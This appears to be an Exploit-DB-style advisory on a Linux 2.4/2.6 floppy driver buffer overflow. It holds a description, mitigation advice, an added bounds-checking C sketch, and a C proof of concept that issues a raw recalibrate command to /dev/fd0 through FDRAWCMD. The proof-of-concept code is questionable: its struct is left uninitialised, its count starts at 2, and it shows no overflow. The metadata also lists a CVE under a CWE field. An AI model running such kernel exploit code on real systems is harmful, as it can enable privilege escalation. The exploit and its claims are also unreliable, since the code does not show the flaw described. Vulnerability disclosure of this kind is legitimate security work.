Vendor: Linux Kernel
By: Javier Kohen
CVSS: 7.8 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: Linux Kernel
Affected Version From: 2.4.x
Affected Version To: 2.6.x
Patch Exists: YES
Related CWE: CVE-2005-1763
CPE: o:linux:linux_kernel
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2005

Floppy Disk Recalibration Vulnerability

A buffer overflow vulnerability exists in the fd_recalibrate() function of the floppy disk driver in Linux kernel versions 2.4.x and 2.6.x. The vulnerability is caused by the lack of proper bounds checking when writing to the floppy disk drive. An attacker can exploit this vulnerability by sending a specially crafted request to the floppy disk driver, resulting in a buffer overflow and potentially allowing the execution of arbitrary code.

Mitigation:

Apply the appropriate patch from the vendor.
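
The description above attributes the flaw to missing bounds checking. The following is an added example, not code from the kernel, the vendor patch or the original page: a user-space sketch of that class of check, applied to a request with a caller-controlled length and a fixed-size command array. The names raw_cmd_model, MODEL_CMD_MAX, raw_cmd_push, raw_cmd_validate and raw_cmd_queue are hypothetical, and the 16-byte capacity is an assumption of this model.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define MODEL_CMD_MAX 16 /* assumed capacity of cmd[] in this model */

/* Constructed, simplified model of a raw command request (not the kernel struct). */
struct raw_cmd_model {
    unsigned int flags;
    unsigned char cmd_count;          /* caller-controlled length */
    unsigned char cmd[MODEL_CMD_MAX]; /* fixed-size command bytes */
};

/* Checked form of the `cmd[cmd_count++] = byte` append pattern. */
int raw_cmd_push(struct raw_cmd_model *rc, unsigned char byte) {
    if (rc == NULL) return -EINVAL;
    if (rc->cmd_count >= MODEL_CMD_MAX) return -ENOSPC;
    rc->cmd[rc->cmd_count++] = byte;
    return 0;
}

/* Receiver side: never trust the declared length of an incoming request. */
int raw_cmd_validate(const struct raw_cmd_model *rc) {
    if (rc == NULL) return -EINVAL;
    if (rc->cmd_count == 0 || rc->cmd_count > MODEL_CMD_MAX) return -EINVAL;
    return 0;
}

/* Copy command bytes to a fixed-size destination only after both bounds hold. */
int raw_cmd_queue(const struct raw_cmd_model *rc, unsigned char *dst, size_t dst_len) {
    int err = raw_cmd_validate(rc);
    if (err) return err;
    if (dst == NULL || rc->cmd_count > dst_len) return -ENOSPC;
    memcpy(dst, rc->cmd, rc->cmd_count);
    return rc->cmd_count;
}

int main(void) {
    struct raw_cmd_model rc = {0}; /* zero-initialised, constructed sample */
    unsigned char fifo[MODEL_CMD_MAX];
    raw_cmd_push(&rc, 0x07);
    raw_cmd_push(&rc, 0x00);
    printf("well-formed: %d\n", raw_cmd_queue(&rc, fifo, sizeof fifo));
    rc.cmd_count = 200; /* declared length larger than cmd[] */
    printf("oversized:   %d\n", raw_cmd_queue(&rc, fifo, sizeof fifo));
    return 0;
}
```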

Exploit-DB raw data:

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>   /* ioctl() prototype, missing from the original listing */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>

/* Build the drive/head select byte of the controller command. */
static int drive_selector(int head) {
    return (head << 2);
}

void fd_recalibrate(int fd) {
    struct floppy_raw_cmd raw_cmd;
    int tmp;

    raw_cmd.flags = FD_RAW_INTR;
    /* cmd_count starts at 2, so the two bytes below are stored in
       cmd[2] and cmd[3] and the count passed to the driver is 4. */
    raw_cmd.cmd_count = 2;

    // set up the command
    raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;              /* recalibrate opcode */
    raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); /* drive/head select */
    tmp = ioctl(fd, FDRAWCMD, &raw_cmd);
    printf("Status:%d\n", tmp);
}

int main() {
    int fd;

    printf("Start\n");
    fd = open("/dev/fd0", O_RDWR | O_NDELAY);
    fd_recalibrate(fd);
    close(fd);
    printf("End\n");
    return 0;
}